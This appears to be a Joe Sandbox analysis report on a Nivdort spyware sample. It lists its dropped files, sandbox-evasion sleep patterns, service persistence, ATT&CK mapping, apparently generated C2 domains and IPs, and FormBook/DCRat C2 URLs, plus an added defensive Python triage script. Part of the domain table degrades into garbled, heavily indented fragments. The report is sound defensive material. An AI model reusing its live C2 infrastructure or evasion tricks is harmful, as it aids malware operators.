Source: C:\Users\user\Desktop\mtuXDnH1Di.exe  Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes  graph_0-9791
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe  Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes  graph_2-10024
Source: C:\whfkpbh\idtpqzltyfy.exe  Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes  graph_3-10273
Source: C:\whfkpbh\amdrhfskpcu.exe  Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes  graph_5-9834
Source: C:\whfkpbh\amdrhfskpcu.exe TID: 7244  Thread sleep count: 656 > 30
Source: C:\whfkpbh\amdrhfskpcu.exe TID: 7244  Thread sleep time: -656000s >= -30000s
Source: C:\whfkpbh\amdrhfskpcu.exe TID: 7244  Thread sleep count: 1220 > 30
Source: C:\whfkpbh\amdrhfskpcu.exe TID: 7244  Thread sleep time: -1220000s >= -30000s
Source: C:\whfkpbh\idtpqzltyfy.exe TID: 7916  Thread sleep count: 365 > 30
Source: C:\whfkpbh\idtpqzltyfy.exe TID: 7916  Thread sleep time: -18250000s >= -30000s
Source: C:\whfkpbh\idtpqzltyfy.exe TID: 7916  Thread sleep time: -50000s >= -30000s
Source: C:\whfkpbh\amdrhfskpcu.exe TID: 7948  Thread sleep count: 44 > 30
Source: C:\whfkpbh\amdrhfskpcu.exe TID: 7948  Thread sleep time: -44000s >= -30000s
Source: C:\whfkpbh\idtpqzltyfy.exe  Last function: Thread delayed (3 entries)
Source: C:\whfkpbh\amdrhfskpcu.exe  Last function: Thread delayed (2 entries)
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe  Code function: 0_2_00EE9580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose  0_2_00EE9580
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe  Code function: 2_2_009F9580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose  2_2_009F9580
Source: C:\whfkpbh\idtpqzltyfy.exe  Code function: 3_2_00169580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose  3_2_00169580
Source: C:\whfkpbh\amdrhfskpcu.exe  Code function: 5_2_00A59580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose  5_2_00A59580
Source: C:\whfkpbh\idtpqzltyfy.exe  Code function: 6_2_00169580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose  6_2_00169580
Source: C:\whfkpbh\idtpqzltyfy.exe  Code function: 11_2_00169580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose  11_2_00169580
Source: C:\whfkpbh\amdrhfskpcu.exe  Code function: 12_2_00CF9580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose  12_2_00CF9580
Source: C:\whfkpbh\idtpqzltyfy.exe  Thread delayed: delay time: 50000 (2 entries)
Source: idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: idtpqzltyfy.exe, 0000000B.00000002.2532750642.00000000013F7000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
Source: qbf30bzbv7f7qnhdav.exe, 00000002.00000002.1323006933.000000000129E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2532468063.0000021D46824000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe  API call chain: ExitProcess graph end node  graph_0-9573, graph_0-9567, graph_0-9585, graph_0-9528, graph_0-9931, graph_0-10308, graph_0-9514
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe  API call chain: ExitProcess graph end node  graph_2-9636, graph_2-9619, graph_2-9601, graph_2-9652
Source: C:\whfkpbh\idtpqzltyfy.exe  API call chain: ExitProcess graph end node  graph_3-9574, graph_3-9550, graph_3-9563, graph_3-9495, graph_3-9509, graph_3-9534, graph_3-9483
Source: C:\whfkpbh\amdrhfskpcu.exe  API call chain: ExitProcess graph end node  graph_5-9623, graph_5-9994, graph_5-9650, graph_5-9587, graph_5-9574, graph_5-9435, graph_5-9606
Source: C:\whfkpbh\idtpqzltyfy.exe  API call chain: ExitProcess graph end node  graph_6-9593, graph_6-9951, graph_6-9583, graph_6-9609, graph_6-9548, graph_6-9565
Source: C:\whfkpbh\idtpqzltyfy.exe  API call chain: ExitProcess graph end node (7 further entries without a graph ID)
Source: C:\whfkpbh\amdrhfskpcu.exe  API call chain: ExitProcess graph end node (8 further entries without a graph ID)
Source: C:\whfkpbh\idtpqzltyfy.exe  Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe  Code function: 0_2_00EDA930 GetProcessHeap,LoadLibraryA,GetProcAddress,FreeLibrary,HeapAlloc,FreeLibrary,HeapFree,HeapAlloc,FreeLibrary,HeapFree,FreeLibrary  0_2_00EDA930
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe  Code function: 0_2_00ECE2C0 GetProcessHeap,RtlAllocateHeap  0_2_00ECE2C0
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe  Code function: 0_2_00ECB7A0 AllocateAndInitializeSid,CheckTokenMembership  0_2_00ECB7A0
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe  Code function: 0_2_00EF50E0 GetSystemTime,GetTickCount  0_2_00EF50E0
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe  Code function: 0_2_00ED5200 GetVersionExA,CreateDirectoryA,DeleteFileA,RemoveDirectoryA,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,GetTempPathA,CreateDirectoryA,GetTempPathA,SetFileAttributesA  0_2_00ED5200
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
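The 0_2_00ED0500 chain above (OpenSCManagerA, CreateServiceA, ChangeServiceConfig2A, StartServiceA) is the persistence step, and every dropped binary lives under C:\whfkpbh\. The "Registry key value modified" entry for W32Time\Config, by contrast, is written by svchost.exe, which the section-load list shows hosting w32time.dll, so on its own that line is consistent with the Windows Time service maintaining its configuration rather than being proof of tampering. What a responder wants from the service database is therefore the binary path, not that key. The script below is an added example and not part of the Joe Sandbox report: it parses a constructed excerpt in the text layout that `reg query HKLM\SYSTEM\CurrentControlSet\Services /s` prints and flags services whose executable or ServiceDll sits outside the system directories. The service name ExampleSvc is hypothetical (the report does not name the service the sample creates), and the trusted roots assume a default C: install.

```python
"""Triage Windows service definitions for binaries outside the system directories.

Added example, not part of the Joe Sandbox report. REG_QUERY is a constructed
excerpt in the text layout of `reg query HKLM\\SYSTEM\\CurrentControlSet\\Services /s`;
the service name ExampleSvc is hypothetical.
"""
import re

REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time
    ImagePath    REG_EXPAND_SZ    %SystemRoot%\system32\svchost.exe -k LocalService
    ServiceDll    REG_EXPAND_SZ    %SystemRoot%\system32\w32time.dll
    Start    REG_DWORD    0x3

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Config
    LastClockRate    REG_DWORD    0x2625a

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ExampleSvc
    ImagePath    REG_SZ    C:\whfkpbh\idtpqzltyfy.exe
    Start    REG_DWORD    0x2
    Type    REG_DWORD    0x10

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler
    ImagePath    REG_EXPAND_SZ    %SystemRoot%\System32\spoolsv.exe
    Start    REG_DWORD    0x2
"""

# A service key is exactly one level below ...\Services; deeper keys are parameters.
SERVICE_KEY = re.compile(r"^HKEY_LOCAL_MACHINE\\SYSTEM\\[^\\]+\\Services\\([^\\]+)$", re.I)
VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*)$")
START_TYPES = {"0x0": "boot", "0x1": "system", "0x2": "auto", "0x3": "manual", "0x4": "disabled"}
# Assumption: default install drive; binaries under these roots are treated as expected.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def parse_services(text):
    """Map service name -> {value name: data}; subkeys such as W32Time\\Config are skipped."""
    services, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            m = SERVICE_KEY.match(line.strip())
            current = services.setdefault(m.group(1), {}) if m else None
            continue
        m = VALUE_LINE.match(line)
        if m and current is not None:
            current[m.group(1)] = m.group(3).strip()
    return services


def binary_path(value):
    """Executable or DLL named by an ImagePath/ServiceDll value, without quotes or arguments."""
    m = re.match(r'\s*"?([^"]*?\.(?:exe|dll|sys))', value, re.I)
    path = m.group(1) if m else value
    # Expand only %SystemRoot%, the variable the stock service entries use.
    return re.sub(r"%systemroot%", lambda _: "C:\\Windows", path, flags=re.I)


def suspicious_services(text):
    """(name, start type, [untrusted binaries]) for every service whose code lives
    outside TRUSTED_ROOTS; a service binary under C:\\whfkpbh\\ is what the dropper
    in this report would leave behind."""
    findings = []
    for name, values in parse_services(text).items():
        binaries = [binary_path(v) for k, v in values.items()
                    if k.lower() in ("imagepath", "servicedll")]
        untrusted = [b for b in binaries if not b.lower().startswith(TRUSTED_ROOTS)]
        if untrusted:
            findings.append((name, START_TYPES.get(values.get("Start", ""), "unknown"), untrusted))
    return findings
```

Run it against real output by piping `reg query HKLM\SYSTEM\CurrentControlSet\Services /s` into a file and passing its text to suspicious_services; an auto-start service pointing at a user-writable directory is the finding to chase, and the W32Time entry is left alone because both of its binaries resolve under C:\Windows.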
MITRE ATT&CK Matrix (one line per tactic column; a count in parentheses is the number of signatures mapped to that technique, the remaining entries are the matrix template cells)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Service Execution (2); Native API (2); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: Windows Service (14); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Windows Service (14); Process Injection (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (11); Process Injection (1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); File Deletion (1); Indicator Removal from Tools; HTML Smuggling
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (1); Security Software Discovery (111); Virtualization/Sandbox Evasion (11); Process Discovery (2); Application Window Discovery (1); System Service Discovery (1); System Network Configuration Discovery (1); File and Directory Discovery (1); System Information Discovery (4)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Encrypted Channel (2); Ingress Tool Transfer (4); Non-Application Layer Protocol (3); Application Layer Protocol (3); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID 1488113; sample mtuXDnH1Di.exe; start date 05/08/2024; architecture WINDOWS; score 88)

Top-level signatures: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Machine Learning detection for sample; 2 other signatures
Top-level DNS/IP: womantrust.net; womaninclude.net;	169 other IPs or domains

Process tree (bracketed figures are the per-node counts carried in the original graph; "ports A -> B" is local port -> remote port):

mtuXDnH1Di.exe [6]
    dropped C:\whfkpbh\qbf30bzbv7f7qnhdav.exe (PE32)
    started qbf30bzbv7f7qnhdav.exe [10]
        dropped C:\whfkpbh\idtpqzltyfy.exe (PE32): Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
        started idtpqzltyfy.exe [4]
idtpqzltyfy.exe [10] (started from the graph's start node rather than by another analysed process)
    DNS/IP: followfriend.net 188.225.40.227, ports 49718 -> 80, TIMEWEB-ASRU, Russian Federation; womanbelieve.net 15.197.142.173, ports 49703 -> 80, TANDEMUS, United States; 10 other IPs or domains
    dropped C:\whfkpbh\amdrhfskpcu.exe (PE32): Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
    started amdrhfskpcu.exe [4]
        started idtpqzltyfy.exe [8]
            started amdrhfskpcu.exe [4]
svchost.exe
svchost.exe

Source  Detection  Scanner  Label  Link
mtuXDnH1Di.exe  92%  ReversingLabs  Win32.Spyware.Nivdort
mtuXDnH1Di.exe  100%  Avira  TR/Nivdort.Gen2
mtuXDnH1Di.exe  100%  Joe Sandbox ML

Source  Detection  Scanner  Label  Link
C:\whfkpbh\idtpqzltyfy.exe  100%  Avira  TR/Nivdort.Gen2
C:\whfkpbh\amdrhfskpcu.exe  100%  Avira  TR/Nivdort.Gen2
C:\whfkpbh\qbf30bzbv7f7qnhdav.exe  100%  Avira  TR/Nivdort.Gen2
C:\whfkpbh\idtpqzltyfy.exe  100%  Joe Sandbox ML
C:\whfkpbh\amdrhfskpcu.exe  100%  Joe Sandbox ML
C:\whfkpbh\qbf30bzbv7f7qnhdav.exe  100%  Joe Sandbox ML
C:\whfkpbh\amdrhfskpcu.exe  92%  ReversingLabs  Win32.Spyware.Nivdort
C:\whfkpbh\idtpqzltyfy.exe  92%  ReversingLabs  Win32.Spyware.Nivdort
C:\whfkpbh\qbf30bzbv7f7qnhdav.exe  92%  ReversingLabs  Win32.Spyware.Nivdort
No Antivirus matches
No Antivirus matches
Source  Detection  Scanner  Label  Link
https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_  0%  Avira URL Cloud  safe
https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par  0%  Avira URL Cloud  safe
https://fasthosts.co.uk/  0%  Avira URL Cloud  safe
https://followfriend.net/index.php  0%  Avira URL Cloud  safe
https://www.fasthosts.co.uk/domain-names/search/?domain=$  0%  Avira URL Cloud  safe
Name  IP  Active  Malicious  Antivirus Detection  Reputation
crowdtrust.net  170.187.200.48  true  false  -  unknown
watersystem.net  64.190.63.222  true  false  -  unknown
thoughtsystem.net  213.171.195.105  true  false  -  unknown
membersystem.net  85.13.130.3  true  false  -  unknown
partygeneral.net  3.33.130.190  true  false  -  unknown
womanbelieve.net  15.197.142.173  true  false  -  unknown
womanhonor.net  54.244.188.177  true  false  -  unknown
membertrust.net  3.33.130.190  true  false  -  unknown
memberreceive.net  35.164.78.200  true  false  -  unknown
followfriend.net  188.225.40.227  true  false  -  unknown
partybelieve.net  15.197.192.55  true  false  -  unknown
freshfancy.net  81.169.145.88  true  false  -  unknown
alreadyfriend.net  15.197.192.55  true  false  -  unknown
thoughtbranch.net  34.246.200.160  true  false  -  unknown
beginhonor.net  unknown  unknown  true  -  unknown
memberlaughter.net  unknown  unknown  true  -  unknown
freshneither.net  unknown  unknown  true  -  unknown
thoughtneither.net  unknown  unknown  true  -  unknown
experiencefancy.net  unknown  unknown  true  -  unknown
followconsider.net  unknown  unknown  true  -  unknown
alreadyhonor.net  unknown  unknown  true  -  unknown
fighttrust.net  unknown  unknown  true  -  unknown
knownsystem.net  unknown  unknown  true  -  unknown
gentlemanhonor.net  unknown  unknown  true  -  unknown
memberfriend.net  unknown  unknown  true  -  unknown
freshtrust.net  unknown  unknown  true  -  unknown
experiencetrust.net  unknown  unknown  true  -  unknown
alreadybelieve.net  unknown  unknown  true  -  unknown
partyclear.net  unknown  unknown  true  -  unknown
waterquarter.net  unknown  unknown  true  -  unknown
fightbranch.net  unknown  unknown  true  -  unknown
knownlaughter.net  unknown  unknown  true  -  unknown
followtrust.net  unknown  unknown  true  -  unknown
experiencebelieve.net  unknown  unknown  true  -  unknown
summerhonor.net  unknown  unknown  true  -  unknown
thoughttrust.net  unknown  unknown  true  -  unknown
freshhonor.net  unknown  unknown  true  -  unknown
followfancy.net  unknown  unknown  true  -  unknown
freshfriend.net  unknown  unknown  true  -  unknown
freshconsider.net  unknown  unknown  true  -  unknown
summerquarter.net  unknown  unknown  true  -  unknown
gentlemantrust.net  unknown  unknown  true  -  unknown
fightinclude.net  unknown  unknown  true  -  unknown
gentlemanlaughter.net  unknown  unknown  true  -  unknown
memberbelieve.net  unknown  unknown  true  -  unknown
alreadylaughter.net  unknown  unknown  true  -  unknown
summerreceive.net  unknown  unknown  true  -  unknown
smokequarter.net  unknown
                                                                                                unknowntrue
                                                                                                  unknown
                                                                                                  experiencesystem.net
                                                                                                  unknown
                                                                                                  unknowntrue
                                                                                                    unknown
                                                                                                    thoughthonor.net
                                                                                                    unknown
                                                                                                    unknowntrue
                                                                                                      unknown
                                                                                                      followbelieve.net
                                                                                                      unknown
                                                                                                      unknowntrue
                                                                                                        unknown
                                                                                                        knowntrust.net
                                                                                                        unknown
                                                                                                        unknowntrue
                                                                                                          unknown
                                                                                                          partybranch.net
                                                                                                          unknown
                                                                                                          unknowntrue
                                                                                                            unknown
                                                                                                            crowdneither.net
                                                                                                            unknown
                                                                                                            unknowntrue
                                                                                                              unknown
                                                                                                              womaninclude.net
                                                                                                              unknown
                                                                                                              unknowntrue
                                                                                                                unknown
                                                                                                                smokebelieve.net
                                                                                                                unknown
                                                                                                                unknowntrue
                                                                                                                  unknown
                                                                                                                  fightnorth.net
                                                                                                                  unknown
                                                                                                                  unknowntrue
                                                                                                                    unknown
                                                                                                                    gentlemanneither.net
                                                                                                                    unknown
                                                                                                                    unknowntrue
                                                                                                                      unknown
                                                                                                                      followquarter.net
                                                                                                                      unknown
                                                                                                                      unknowntrue
                                                                                                                        unknown
                                                                                                                        knownhonor.net
                                                                                                                        unknown
                                                                                                                        unknowntrue
                                                                                                                          unknown
                                                                                                                          womantrust.net
                                                                                                                          unknown
                                                                                                                          unknowntrue
                                                                                                                            unknown
                                                                                                                            memberquarter.net
                                                                                                                            unknown
                                                                                                                            unknowntrue
                                                                                                                              unknown
                                                                                                                              experiencefriend.net
                                                                                                                              unknown
                                                                                                                              unknowntrue
                                                                                                                                unknown
                                                                                                                                waterbranch.net
                                                                                                                                unknown
                                                                                                                                unknowntrue
                                                                                                                                  unknown
                                                                                                                                  smoketrust.net
                                                                                                                                  unknown
                                                                                                                                  unknowntrue
                                                                                                                                    unknown
                                                                                                                                    gentlemanreceive.net
                                                                                                                                    unknown
                                                                                                                                    unknowntrue
                                                                                                                                      unknown
                                                                                                                                      fightsystem.net
                                                                                                                                      unknown
                                                                                                                                      unknowntrue
                                                                                                                                        unknown
                                                                                                                                        memberfancy.net
                                                                                                                                        unknown
                                                                                                                                        unknowntrue
                                                                                                                                          unknown
                                                                                                                                          crowdhonor.net
                                                                                                                                          unknown
                                                                                                                                          unknowntrue
                                                                                                                                            unknown
                                                                                                                                            summerbelieve.net
                                                                                                                                            unknown
                                                                                                                                            unknowntrue
                                                                                                                                              unknown
                                                                                                                                              womanbranch.net
                                                                                                                                              unknown
                                                                                                                                              unknowntrue
                                                                                                                                                unknown
                                                                                                                                                crowdbranch.net
                                                                                                                                                unknown
                                                                                                                                                unknowntrue
                                                                                                                                                  unknown
                                                                                                                                                  beginbranch.net
                                                                                                                                                  unknown
                                                                                                                                                  unknowntrue
                                                                                                                                                    unknown
                                                                                                                                                    experiencehonor.net
                                                                                                                                                    unknown
                                                                                                                                                    unknowntrue
                                                                                                                                                      unknown
                                                                                                                                                      waterreceive.net
                                                                                                                                                      unknown
                                                                                                                                                      unknowntrue
                                                                                                                                                        unknown
                                                                                                                                                        gentlemansystem.net
                                                                                                                                                        unknown
                                                                                                                                                        unknowntrue
                                                                                                                                                          unknown
                                                                                                                                                          crowdsystem.net
                                                                                                                                                          unknown
                                                                                                                                                          unknowntrue
                                                                                                                                                            unknown
                                                                                                                                                            knownbelieve.net
                                                                                                                                                            unknown
                                                                                                                                                            unknowntrue
                                                                                                                                                              unknown
                                                                                                                                                              knownquarter.net
                                                                                                                                                              unknown
                                                                                                                                                              unknowntrue
                                                                                                                                                                unknown
                                                                                                                                                                beginsystem.net
                                                                                                                                                                unknown
                                                                                                                                                                unknowntrue
                                                                                                                                                                  unknown
                                                                                                                                                                  followsystem.net
                                                                                                                                                                  unknown
                                                                                                                                                                  unknowntrue
                                                                                                                                                                    unknown
                                                                                                                                                                    crowdreceive.net
                                                                                                                                                                    unknown
                                                                                                                                                                    unknowntrue
                                                                                                                                                                      unknown
                                                                                                                                                                      alreadyquarter.net
                                                                                                                                                                      unknown
                                                                                                                                                                      unknowntrue
                                                                                                                                                                        unknown
                                                                                                                                                                        beginquarter.net
                                                                                                                                                                        unknown
                                                                                                                                                                        unknowntrue
                                                                                                                                                                          unknown
                                                                                                                                                                          freshbelieve.net
                                                                                                                                                                          unknown
                                                                                                                                                                          unknowntrue
                                                                                                                                                                            unknown
                                                                                                                                                                            alreadyconsider.net
                                                                                                                                                                            unknown
                                                                                                                                                                            unknowntrue
                                                                                                                                                                              unknown
                                                                                                                                                                              alreadytrust.net
                                                                                                                                                                              unknown
                                                                                                                                                                              unknowntrue
                                                                                                                                                                                unknown
                                                                                                                                                                                freshquarter.net
                                                                                                                                                                                unknown
                                                                                                                                                                                unknowntrue
                                                                                                                                                                                  unknown
                                                                                                                                                                                  gentlemanfriend.net
                                                                                                                                                                                  unknown
                                                                                                                                                                                  unknowntrue
                                                                                                                                                                                    unknown
                                                                                                                                                                                    beginbelieve.net
                                                                                                                                                                                    unknown
                                                                                                                                                                                    unknowntrue
                                                                                                                                                                                      unknown
                                                                                                                                                                                      memberhonor.net
                                                                                                                                                                                      unknown
                                                                                                                                                                                      unknowntrue
                                                                                                                                                                                        unknown
                                                                                                                                                                                        summersystem.net
                                                                                                                                                                                        unknown
                                                                                                                                                                                        unknowntrue
                                                                                                                                                                                          unknown
                                                                                                                                                                                          partyquarter.net
                                                                                                                                                                                          unknown
                                                                                                                                                                                          unknowntrue
                                                                                                                                                                                            unknown
                                                                                                                                                                                            alreadyfancy.net
Name | Source | Malicious | Antivirus Detection | Reputation
https://fasthosts.co.uk/ | idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.fasthosts.co.uk/domain-names/search/?domain=$ | idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://followfriend.net/index.php | idtpqzltyfy.exe, 00000003.00000002.2069906189.0000000001F6D000.00000004.00000010.00020000.00000000.sdmp, idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_ | idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par | idtpqzltyfy.exe, 00000003.00000002.2069906189.0000000001F6D000.00000004.00000010.00020000.00000000.sdmp, idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.225.40.227 | followfriend.net | Russian Federation | 9123 | TIMEWEB-ASRU | false
34.246.200.160 | thoughtbranch.net | United States | 16509 | AMAZON-02US | false
35.164.78.200 | memberreceive.net | United States | 16509 | AMAZON-02US | false
15.197.142.173 | womanbelieve.net | United States | 7430 | TANDEMUS | false
64.190.63.222 | watersystem.net | United States | 11696 | NBS11696US | false
85.13.130.3 | membersystem.net | Germany | 34788 | NMM-ASD-02742FriedersdorfHauptstrasse68DE | false
170.187.200.48 | crowdtrust.net | United States | 7018 | ATT-INTERNET4US | false
54.244.188.177 | womanhonor.net | United States | 16509 | AMAZON-02US | false
15.197.192.55 | partybelieve.net | United States | 7430 | TANDEMUS | false
3.33.130.190 | partygeneral.net | United States | 8987 | AMAZONEXPANSIONGB | false
213.171.195.105 | thoughtsystem.net | United Kingdom | 8560 | ONEANDONE-ASBrauerstrasse48DE | false
81.169.145.88 | freshfancy.net | Germany | 6724 | STRATOSTRATOAGDE | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1488113
Start date and time: 2024-08-05 16:21:56 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 0s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: mtuXDnH1Di.exe (renamed because the original name is a hash value)
Original Sample Name: 475c13ae1d446c61824315961e5838916ac4a3f28bc441aa8a2b39b81383ea4a.exe
Detection: MAL
Classification: mal88.troj.winEXE@14/5@215/12
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 82
• Number of non-executed functions: 88
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 40.119.148.38
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: mtuXDnH1Di.exe
Time | Type | Description
11:45:33 | API Interceptor | 1858x Sleep call for process: amdrhfskpcu.exe modified
11:46:18 | API Interceptor | 428x Sleep call for process: idtpqzltyfy.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
188.225.40.227 | BeR96suzTx.exe | Get hash | malicious | FormBook | Browse
• www.skazhiraku.net/itq4/?ATvHA=k2MpXHpX2FlDSbL&m8=xx/ELnNnKvtlLUNVhX4h3nTX7+vGZrU3iKsqjiSQXnXFY1tr2Fuuzh2bLYvRiJP5MpAf
188.225.40.227 | Rh3zHXGC0W.exe | Get hash | malicious | FormBook | Browse
• www.ikra-prem.space/g8kn/?3f=SObGRIQc2SXqBOlWxSNvpO1BE/+cxQu6skH9Iz/5ZN4shibJkSmH+F/+6dh/KvA+GdhZXNtYOg==&s2J=v6Ah24bh4tF
188.225.40.227 | doc88.exe | Get hash | malicious | FormBook | Browse
• www.skazhiraku.net/itq4/?BJ=xx/ELnNnKvtlLUNVhX4h3nTX7+vGZrU3iKsqjiSQXnXFY1tr2Fuuzh2bLbPBtofBSMpY&k6Apv=4hB0VF
188.225.40.227 | p6le0wM39E.exe | Get hash | malicious | DCRat | Browse
• cq80904.tmweb.ru/vmHttpdefaultDb.php?K5Glm1IjUwWQCq0Uioy42v=MLZsFTiDn8Em9rir7K7wImpq3&EXQnpxYJ4aMICQvs=R7D0m961u58njgszmOLxASR&0xIfyHrB=3XszmcYUw52afU&3fe0eef725958b7929a02603a5aa73a2=f84fad6cd29a3006db8b86eab6e3e434&36f380f5a045f0456c7866159c7edf74=AZ4YzM3YjZzgDNxkzM5UzMhNTNmVTNhNjN0MmZ4EmN4gzYmVjN4kTZ&K5Glm1IjUwWQCq0Uioy42v=MLZsFTiDn8Em9rir7K7wImpq3&EXQnpxYJ4aMICQvs=R7D0m961u58njgszmOLxASR&0xIfyHrB=3XszmcYUw52afU
188.225.40.227 | UYAfvxRha7.exe | Get hash | malicious | DCRat | Browse
• cq80904.tmweb.ru/vmHttpdefaultDb.php?wNx8559dK63E8kRo7N3gYQ=50VYeNDsGBfOUR3suNfn4yWU&3fe0eef725958b7929a02603a5aa73a2=f84fad6cd29a3006db8b86eab6e3e434&36f380f5a045f0456c7866159c7edf74=AZ1MGNjVWZkZTMmRGOmRjNiZWMlNzYiNGZwEmY2UjNlRGZyMmZyQWM&wNx8559dK63E8kRo7N3gYQ=50VYeNDsGBfOUR3suNfn4yWU
